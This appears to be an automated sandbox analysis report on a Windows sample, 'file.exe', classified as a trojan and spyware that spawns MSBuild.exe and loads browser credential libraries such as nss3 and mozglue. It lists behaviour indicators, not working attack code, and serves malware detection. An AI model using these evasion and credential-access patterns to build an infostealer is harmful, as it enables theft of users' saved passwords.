Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0042D681	1_2_0042D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4935A0	1_2_6C4935A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A5440	1_2_6C4A5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C50545C	1_2_6C50545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C50AC00	1_2_6C50AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D5C10	1_2_6C4D5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4E2C10	1_2_6C4E2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C50542B	1_2_6C50542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A64C0	1_2_6C4A64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4BD4D0	1_2_6C4BD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49D4E0	1_2_6C49D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D6CF0	1_2_6C4D6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A6C80	1_2_6C4A6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4F34A0	1_2_6C4F34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4FC4A0	1_2_6C4FC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4AFD00	1_2_6C4AFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4BED10	1_2_6C4BED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4C0512	1_2_6C4C0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D0DD0	1_2_6C4D0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4F85F0	1_2_6C4F85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4E2E4E	1_2_6C4E2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4B4640	1_2_6C4B4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4B9E50	1_2_6C4B9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D3E50	1_2_6C4D3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C506E63	1_2_6C506E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49C670	1_2_6C49C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4E5600	1_2_6C4E5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D7E10	1_2_6C4D7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4F9E30	1_2_6C4F9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5076E3	1_2_6C5076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49BEF0	1_2_6C49BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4AFEF0	1_2_6C4AFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4FE680	1_2_6C4FE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4B5E90	1_2_6C4B5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4F4EA0	1_2_6C4F4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A9F00	1_2_6C4A9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D7710	1_2_6C4D7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49DFE0	1_2_6C49DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4C6FF0	1_2_6C4C6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4E77A0	1_2_6C4E77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4B8850	1_2_6C4B8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4BD850	1_2_6C4BD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4DF070	1_2_6C4DF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A7810	1_2_6C4A7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4DB820	1_2_6C4DB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4E4820	1_2_6C4E4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5050C7	1_2_6C5050C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4BC0E0	1_2_6C4BC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D58E0	1_2_6C4D58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4C60A0	1_2_6C4C60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4BA940	1_2_6C4BA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C50B170	1_2_6C50B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4AD960	1_2_6C4AD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4EB970	1_2_6C4EB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D5190	1_2_6C4D5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4F2990	1_2_6C4F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49C9A0	1_2_6C49C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4CD9B0	1_2_6C4CD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D9A60	1_2_6C4D9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4D8AC0	1_2_6C4D8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4B1AF0	1_2_6C4B1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4DE2F0	1_2_6C4DE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C50BA90	1_2_6C50BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C502AB0	1_2_6C502AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4922A0	1_2_6C4922A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4C4AA0	1_2_6C4C4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4ACAB0	1_2_6C4ACAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C495340	1_2_6C495340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4AC370	1_2_6C4AC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4DD320	1_2_6C4DD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5053C8	1_2_6C5053C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C49F380	1_2_6C49F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C54AC60	1_2_6C54AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C61AC30	1_2_6C61AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C606C00	1_2_6C606C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C59ECD0	1_2_6C59ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C53ECC0	1_2_6C53ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C60ED70	1_2_6C60ED70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C4CCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C4D94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 010078D0 appears 49 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .data ZLIB complexity 0.9920072115384615

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/28@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_6C4F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6C4F7030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

1_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\SDKE8HXH.htm

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HDBGHI.1.dr, JKFCBA.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dcomp.dll	Jump to behavior
